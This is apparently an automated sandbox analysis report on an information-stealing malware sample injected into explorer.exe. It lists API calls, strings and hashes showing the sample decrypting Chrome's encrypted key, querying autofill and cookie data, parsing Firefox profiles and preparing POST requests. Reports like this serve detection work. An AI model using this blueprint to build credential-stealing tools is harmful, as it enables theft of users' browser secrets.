                        control_flow_graph 641 3003e04-3003e11 call 3001b6a 644 3003ed4-3003ed8 641->644 645 3003e17-3003e22 call 3001c31 641->645 645->644 648 3003e28-3003e34 call 3002fb1 645->648 651 3003ec8-3003ecc 648->651 652 3003e3a-3003e4f call 300123b 648->652 651->644 655 3003ec0-3003ec7 call 3001011 652->655 656 3003e51-3003e58 652->656 655->651 657 3003e5a-3003e6a 656->657 658 3003ebf 656->658 660 3003eb8-3003eba call 3001011 657->660 661 3003e6c-3003e7c RtlCompareMemory 657->661 658->655 660->658 661->660 663 3003e7e-3003ea6 CryptUnprotectData 661->663 663->660 665 3003ea8-3003ead 663->665 665->660 666 3003eaf-3003eb3 665->666 666->660
                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                          • Part of subcall function 03001C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03003E1E,00000000,?,03003FA8), ref: 03001C46
                          • Part of subcall function 03001C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,03003FA8), ref: 03001C56
                          • Part of subcall function 03001C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03003FA8), ref: 03001C76
                          • Part of subcall function 03001C31: CloseHandle.KERNEL32(00000000,?,03003FA8), ref: 03001C91
                          • Part of subcall function 03002FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03003E30,00000000,00000000,?,03003FA8), ref: 03002FC1
                          • Part of subcall function 03002FB1: lstrlen.KERNEL32("encrypted_key":",?,03003FA8), ref: 03002FCE
                          • Part of subcall function 03002FB1: StrStrIA.SHLWAPI("encrypted_key":",0305692C,?,03003FA8), ref: 03002FDD
                          • Part of subcall function 0300123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,03003E4B,00000000), ref: 0300124A
                          • Part of subcall function 0300123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001268
                          • Part of subcall function 0300123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001295
                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 03003E74
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03003E9E
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$Crypt$BinaryCloseCreateStringlstrlen$ChangeCompareDataFindHandleMemoryNotificationReadSizeUnprotect
                        • String ID: $DPAP$DPAP$IDPAP
                        • API String ID: 3124818977-957854035
                        • Opcode ID: 57b8936067b49b19aa3f8950799072526fc31d393cd0e881dff1d6780cef4e40
                        • Instruction ID: bea978bd0319b1678e61efc9d4f5d1254f1f83c55af3ca5c290c0c329fe8abfc
                        • Opcode Fuzzy Hash: 57b8936067b49b19aa3f8950799072526fc31d393cd0e881dff1d6780cef4e40
                        • Instruction Fuzzy Hash: 0821C97A6063856BE716EA658880BBFF2DD6F84700F480A6DE941C72C0EB78C9058792
                        Function 03004B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0300116F
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03004BB6
                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 03004BBF
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                        • String ID:
                        • API String ID: 1675517319-0
                        • Opcode ID: 589bd61c8bde3833fbb91c9da0c411ab9a4aa911247ac12a3db9c7080a1aa3ec
                        • Instruction ID: 685ad0d6d2d26f39636717322761418f5a202c3627391a5e41c14ac51d9aa2ef
                        • Opcode Fuzzy Hash: 589bd61c8bde3833fbb91c9da0c411ab9a4aa911247ac12a3db9c7080a1aa3ec
                        • Instruction Fuzzy Hash: F8E0923580731067E758FB31F818B8B3B9C9BC5261F108554A255860C4CA3A48008A54
                        Function 03001000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 5fd83217c053f4534465c5f6b8b074cdb8cfd63d53a65fd701648949befa991d
                        • Instruction ID: 0584a125f0405788abc2298ddefc91ee9ddfa10090e301c8c1f84df266af13ca
                        • Opcode Fuzzy Hash: 5fd83217c053f4534465c5f6b8b074cdb8cfd63d53a65fd701648949befa991d
                        • Instruction Fuzzy Hash: 17A002755513085BDF4477B8DA0DA2B3518F744703F545544718586445DD6954048725
                        Function 03006512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemInfo.KERNELBASE(030620A4,00000001,00000000,0000000A,03053127,030028DA,00000000,?), ref: 0300BFFC
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: 3469bc8d25973ca8d57912fa60bc4339eaf5d726e2f44774fdd53995d49597bd
                        • Instruction ID: 553af1b2cd101c28e944d1603f5a5f674aedee3f3f875cb66fc72d2b5a111003
                        • Opcode Fuzzy Hash: 3469bc8d25973ca8d57912fa60bc4339eaf5d726e2f44774fdd53995d49597bd
                        • Instruction Fuzzy Hash: DEE0ED3978770839F614F6F86C46F9E155ACFC0B02F505A15B620AD0CEDBA781611126
                        Function 03003C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03003C6A
                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03003C76
                        • DeleteFileW.KERNELBASE(00000000), ref: 03003C7D
                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03003C89
                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 03003D2F
                        • lstrlen.KERNEL32(00000000), ref: 03003D36
                        • wsprintfA.USER32 ref: 03003D55
                        • lstrlen.KERNEL32(00000000), ref: 03003D61
                        • lstrcat.KERNEL32(00000000,?), ref: 03003D89
                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03003DB2
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03003DED
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateChangeCloseCopyCreateFindNameNotificationPathProcesslstrcatwsprintf
                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                        • API String ID: 2925989150-3488123210
                        • Opcode ID: bd2aa5af8b646a7d04ed7d3e2761e175334e52a9b90d6ab7454bccb5123f253e
                        • Instruction ID: 63a2e52160f48948060127b58eb49317c6113d28914c70a3d36455078b98e10e
                        • Opcode Fuzzy Hash: bd2aa5af8b646a7d04ed7d3e2761e175334e52a9b90d6ab7454bccb5123f253e
                        • Instruction Fuzzy Hash: 2E41BF39206305ABE716FB319C80E7F7AEDAFC5644F44186DF8859B281DA36D8018B62
                        Function 030028F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 348 30028f8-30028fa 349 3002900-300291c call 3001000 call 30202ec 348->349 350 3002ac8-3002ada call 3053848 DeleteFileW call 3001011 348->350 359 3002922-300293a call 3001fa7 349->359 360 3002a8f-3002aa2 call 301fb92 lstrlen 349->360 357 3002adf-3002ae6 350->357 365 3002948-300295f call 3001fa7 359->365 366 300293c-3002942 359->366 367 3002ac1-3002ac3 call 3001011 360->367 368 3002aa4-3002abc call 3001798 * 3 360->368 375 3002961-3002967 365->375 376 300296d-3002984 call 3001fa7 365->376 366->365 369 3002944 366->369 367->350 368->367 369->365 375->376 379 3002969 375->379 383 3002992-30029a7 call 3001fa7 376->383 384 3002986-300298c 376->384 379->376 388 30029b5-30029cc call 3001fa7 383->388 389 30029a9-30029af 383->389 384->383 385 300298e 384->385 385->383 393 30029da-30029e5 lstrlen 388->393 394 30029ce-30029d4 388->394 389->388 390 30029b1 389->390 390->388 396 3002a79-3002a85 call 30202ec 393->396 397 30029eb-30029f0 lstrlen 393->397 394->393 395 30029d6 394->395 395->393 396->359 402 3002a8b 396->402 397->396 399 30029f6-3002a11 call 3001000 397->399 404 3002a13 399->404 405 3002a1b-3002a56 call 3002112 wsprintfA lstrlen 399->405 402->360 404->405 408 3002a58-3002a68 call 300102f 405->408 409 3002a6a-3002a74 lstrcat call 3001011 405->409 408->409 409->396
                        APIs
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03002AD2
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 030029E1
                        • lstrlen.KERNEL32(00000000), ref: 030029EC
                        • wsprintfA.USER32 ref: 03002A38
                        • lstrlen.KERNEL32(00000000), ref: 03002A44
                        • lstrcat.KERNEL32(00000000,00000000), ref: 03002A6C
                        • lstrlen.KERNEL32(00000000,?,?), ref: 03002A99
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                        • API String ID: 304071051-2605711689
                        • Opcode ID: 773f29a420f42e16e753794a9dcb7efb168d6cf7dfffdb1373d9f1021b4be74d
                        • Instruction ID: 7f601714644c6a0cdbf0c581d5994e9274a43c8698f7c6b837fcfc320bab6a3d
                        • Opcode Fuzzy Hash: 773f29a420f42e16e753794a9dcb7efb168d6cf7dfffdb1373d9f1021b4be74d
                        • Instruction Fuzzy Hash: 7C5191386063469BE729EF25D854A7FB6DAAFC5304F480C2DF8C59B282DB35D8058752
                        Function 03002CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 484 3002cb5-3002cc7 call 3001953 488 3002e17-3002e2d call 3002ae9 484->488 489 3002ccd-3002d06 call 3001953 call 3001000 * 2 call 3001b6a 484->489 500 3002df9-3002e12 call 3001011 * 4 489->500 501 3002d0c-3002d1c GetPrivateProfileSectionNamesW 489->501 500->488 501->500 502 3002d22-3002d26 501->502 504 3002df5 502->504 505 3002d2c-3002d32 502->505 504->500 507 3002d36-3002d39 505->507 509 3002ded-3002df1 507->509 510 3002d3f-3002d4d StrStrIW 507->510 509->504 512 3002d53-3002d70 GetPrivateProfileStringW 510->512 513 3002dd7-3002de7 lstrlenW 510->513 512->513 515 3002d72-3002d88 GetPrivateProfileIntW 512->515 513->507 513->509 517 3002d8a-3002d9c call 3001953 515->517 518 3002dcc-3002dd2 call 3002ae9 515->518 523 3002db4-3002dca call 3002ae9 call 3001011 517->523 524 3002d9e-3002da2 517->524 518->513 523->513 525 3002da4-3002daa 524->525 526 3002dac-3002db2 524->526 525->526 526->523 526->524
                        APIs
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 03002D13
                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 03002D45
                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,0305637C,?,00000FFF,?), ref: 03002D68
                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 03002D7B
                        • lstrlenW.KERNEL32(00000000), ref: 03002DD8
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateChangeCloseCreateFileFindNamesNotificationProcessSectionString
                        • String ID: IsRelative$Path$Profile$profiles.ini
                        • API String ID: 4264105018-4107377610
                        • Opcode ID: 35afae9f64dc6b173b4afc05f3e471c94ee22a5e1b0c57c7f1cbf6427134bc56
                        • Instruction ID: 1e22f39b8941528ab0f12de0bc7f744560346cf3df79a5b9bf440000cfcacce4
                        • Opcode Fuzzy Hash: 35afae9f64dc6b173b4afc05f3e471c94ee22a5e1b0c57c7f1cbf6427134bc56
                        • Instruction Fuzzy Hash: 6131A3387063055BE755FF31891467FB6EAAFC4300F44482EE9566B2C1DF768C468752
                        Function 03001333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 576 3001333-3001385 call 3001000 call 300106c call 30012a3 583 30013a0-30013a3 576->583 584 3001387-300139e 576->584 586 30013aa-30013ac 583->586 587 30013b0-30013b2 584->587 586->587 588 30013b8-30013ef RtlZeroMemory 587->588 589 30015cb-30015da call 3001011 587->589 593 30015c3-30015ca 588->593 594 30013f5-300141a 588->594 593->589 597 3001420-3001456 call 30010b1 594->597 598 30015bf 594->598 601 3001458 597->601 602 300145d-3001478 597->602 598->593 601->602 604 30015b5 602->604 605 300147e-3001483 602->605 604->598 606 3001485-3001496 605->606 607 300149d-30014c7 call 3001000 wsprintfW 605->607 606->607 610 30014e0-3001509 607->610 611 30014c9-30014cb 607->611 618 30015a5-30015b0 call 3001011 610->618 619 300150f-300151b 610->619 612 30014cc-30014cf 611->612 613 30014d1-30014d6 612->613 614 30014da-30014dc 612->614 613->612 616 30014d8 613->616 614->610 616->610 618->604 619->618 623 3001521-3001537 call 3001000 619->623 626 3001539-3001544 623->626 627 3001546-3001553 call 300102f 626->627 628 3001558-300156f 626->628 627->628 632 3001571 628->632 633 3001573-300157d 628->633 632->633 633->626 634 300157f-3001583 633->634 635 3001585 call 300104c 634->635 636 300159a-30015a1 call 3001011 634->636 640 300158a-3001594 RtlMoveMemory 635->640 636->618 640->636
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                          • Part of subcall function 0300106C: lstrlen.KERNEL32(03246DEE,00000000,00000000,00000000,03001366,74DE8A60,03246DEE,00000000), ref: 03001074
                          • Part of subcall function 0300106C: MultiByteToWideChar.KERNEL32(00000000,00000000,03246DEE,00000001,00000000,00000000), ref: 03001086
                          • Part of subcall function 030012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 030012B5
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 030013C2
                        • wsprintfW.USER32 ref: 030014B5
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03001594
                        Strings
                        • Accept: */*Referer: %S, xrefs: 030014AF
                        • Content-Type: application/x-www-form-urlencoded, xrefs: 030014FB
                        • POST, xrefs: 03001465
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                        • API String ID: 3833683434-704803497
                        • Opcode ID: 50a8c7a66bb1bbb17bdf555959aec9386e38b493646fab7cf8e8bf18fe57fd02
                        • Instruction ID: d7b9e249d00e3d4d0e2e71ac1d26b946a0d0b07844ac507b520442723955341d
                        • Opcode Fuzzy Hash: 50a8c7a66bb1bbb17bdf555959aec9386e38b493646fab7cf8e8bf18fe57fd02
                        • Instruction Fuzzy Hash: 3671BE7860A305AFE754EF68D884A2BBBE9FF88340F44092DF981C7291DB75C904CB56
                        Function 0300B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 667 300b1e5-300b20b 668 300b221-300b22a 667->668 669 300b20d-300b218 call 300aeea 667->669 671 300b240-300b243 668->671 672 300b22c-300b237 call 300ae65 668->672 678 300b3ea-300b3f0 669->678 679 300b21e 669->679 675 300b3b9-300b3d3 671->675 676 300b249-300b26b call 300a7ae 671->676 685 300b3b4-300b3b7 672->685 686 300b23d 672->686 680 300b3db-300b3df 675->680 687 300b296-300b29f 676->687 688 300b26d-300b278 676->688 679->668 683 300b3e1-300b3e3 680->683 684 300b3e8 680->684 683->684 690 300b3e5-300b3e7 683->690 684->678 685->675 689 300b3d5-300b3d8 685->689 686->671 691 300b2a1 687->691 692 300b2d6-300b2ea call 3006a5a 687->692 693 300b27d-300b291 call 300a1c6 688->693 689->680 690->684 694 300b2a3-300b2a7 691->694 695 300b2a9-300b2ad 691->695 702 300b2f6-300b2fd 692->702 703 300b2ec-300b2f1 692->703 693->685 694->692 694->695 695->685 697 300b2b3-300b2b9 call 300a67c 695->697 704 300b2be-300b2c2 697->704 706 300b373 702->706 707 300b2ff-300b30e 702->707 703->685 704->692 709 300b2c4-300b2d4 704->709 708 300b377-300b37a 706->708 707->708 710 300b310-300b329 CreateFileMappingW 708->710 711 300b37c 708->711 709->693 712 300b32b-300b357 MapViewOfFile 710->712 713 300b37e-300b3ab call 300a1c6 710->713 711->685 712->713 714 300b359-300b370 712->714 713->685 718 300b3ad 713->718 714->706 718->685
                        APIs
                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0300B31D
                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0300B34F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$CreateMappingView
                        • String ID: winShmMap1$winShmMap2$winShmMap3
                        • API String ID: 3452162329-3826999013
                        • Opcode ID: a0fdd957a188a9a9100594f75562a08ede2fe0008c4adb49c3f756695f02979c
                        • Instruction ID: e8409d6e123b6536c024295c0166f0c5fcbbf1bdf5d808a11fc1c8eb82aaa3ed
                        • Opcode Fuzzy Hash: a0fdd957a188a9a9100594f75562a08ede2fe0008c4adb49c3f756695f02979c
                        • Instruction Fuzzy Hash: D751C175205701DFEB25CF28C840A6BB7E6FF84314F14882EE9928B2D5DBB4E805CB95
                        Function 0300A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 719 300a40e-300a424 720 300a4a2-300a4aa 719->720 721 300a426-300a42a 719->721 724 300a4ae-300a4c8 720->724 722 300a431-300a441 721->722 723 300a42c-300a42f 721->723 725 300a443 722->725 726 300a469-300a4a0 memcpy 722->726 723->720 723->722 727 300a4cc-300a4e3 ReadFile 724->727 728 300a445-300a448 725->728 729 300a44a-300a45a memcpy 725->729 726->724 730 300a524-300a538 call 300a2aa 727->730 731 300a4e5-300a4ee 727->731 728->726 728->729 732 300a45d 729->732 730->732 737 300a53e-300a553 memset 730->737 731->730 738 300a4f0-300a4ff call 300a250 731->738 734 300a45f-300a466 732->734 737->734 738->727 741 300a501-300a51f call 300a1c6 738->741 741->734
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcpy$FileReadmemset
                        • String ID: winRead
                        • API String ID: 2051157613-2759563040
                        • Opcode ID: 8e2257f7b009a457d88245ffaa122b016908eb467daffa02db006108b000ced7
                        • Instruction ID: a510d23e7dd64e228beb58c7a06da6e29ea799e66cdffab8cb15172634e848d8
                        • Opcode Fuzzy Hash: 8e2257f7b009a457d88245ffaa122b016908eb467daffa02db006108b000ced7
                        • Instruction Fuzzy Hash: DB318F76706340AFE750DE68CC8499FB7EAEFC4350F885928F99587290D670ED048B93
                        Function 03002E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • StrStrIW.KERNELBASE(?,?), ref: 03002E4B
                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03002EE4
                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03002F54
                        • RegCloseKey.KERNELBASE(?), ref: 03002F62
                          • Part of subcall function 030019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                          • Part of subcall function 030019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                          • Part of subcall function 03001BC5: lstrlenW.KERNEL32(00000000,00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001BCC
                          • Part of subcall function 03001BC5: StrStrIW.SHLWAPI(00000000,.exe,?,03002E75,PathToExe,00000000,00000000), ref: 03001BF0
                          • Part of subcall function 03001BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03002E75,PathToExe,00000000,00000000), ref: 03001C05
                          • Part of subcall function 03001BC5: lstrlenW.KERNEL32(00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001C1C
                          • Part of subcall function 03001AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03002E83,PathToExe,00000000,00000000), ref: 03001B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                        • String ID: PathToExe
                        • API String ID: 1799103994-1982016430
                        • Opcode ID: 4ad3215a5dfccb338f0ee2d67989f17d6c8c75abff680cc5e78137d0b040303a
                        • Instruction ID: 8973f28c8ee4bd7a94875b284c3d37e895c92c8a5e4128bb61fd2945ab8fa9ef
                        • Opcode Fuzzy Hash: 4ad3215a5dfccb338f0ee2d67989f17d6c8c75abff680cc5e78137d0b040303a
                        • Instruction Fuzzy Hash: D1318F396063556FA719EF21C808DBFBAE9EFC8350F04492CF8958B284DA75C901CBA1
                        Function 0300A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 782 300a67c-300a692 783 300a6c1-300a6c4 782->783 784 300a694-300a6bf _alldiv _allmul 782->784 785 300a6c7-300a6d2 call 300a33b 783->785 784->785 788 300a6f0-300a6fb SetEndOfFile 785->788 789 300a6d4-300a6df 785->789 791 300a6fd-300a708 788->791 792 300a71e 788->792 790 300a6e4-300a6ee call 300a1c6 789->790 794 300a722-300a726 790->794 791->792 799 300a70a-300a71c 791->799 792->794 797 300a728-300a72b 794->797 798 300a73a-300a740 794->798 797->798 800 300a72d 797->800 799->790 801 300a734-300a737 800->801 802 300a72f-300a732 800->802 801->798 802->798 802->801
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File_alldiv_allmul
                        • String ID: winTruncate1$winTruncate2
                        • API String ID: 3568847005-470713972
                        • Opcode ID: 915c7d141540b1b67028a783f0bec42cf020d50f594ceb4a44b15491eff7c6a4
                        • Instruction ID: e1e3f7513b45e70f311ab266b3a1424a75bc4f7f1f3e7cd0b665556ba4a7b387
                        • Opcode Fuzzy Hash: 915c7d141540b1b67028a783f0bec42cf020d50f594ceb4a44b15491eff7c6a4
                        • Instruction Fuzzy Hash: CD219876302300ABEF54DE2DCC84EAB77AAEF84710F058169FD58DB285D635D800CBA1
                        Function 03004A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • wsprintfW.USER32 ref: 03004AA2
                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 03004AC7
                        • RegCloseKey.KERNELBASE(?), ref: 03004AD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                        • String ID: %s\%08x$Software
                        • API String ID: 1800864259-1658101971
                        • Opcode ID: 681b9ae47f8e7122c9db01bf415f2126fc75a27d18510501218d5d34f891e929
                        • Instruction ID: 049a87168267e58840911d994d67dabac1839f3ed097b09d5dbd9026fc93a2a6
                        • Opcode Fuzzy Hash: 681b9ae47f8e7122c9db01bf415f2126fc75a27d18510501218d5d34f891e929
                        • Instruction Fuzzy Hash: A8012475602208BFEB08DB45CC4AEBF77ACEB41314F80016EF900A3140EAB21D009664
                        Function 03004317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                        Download Yara Rule
                        APIs
                        • _alloca_probe.NTDLL ref: 0300431C
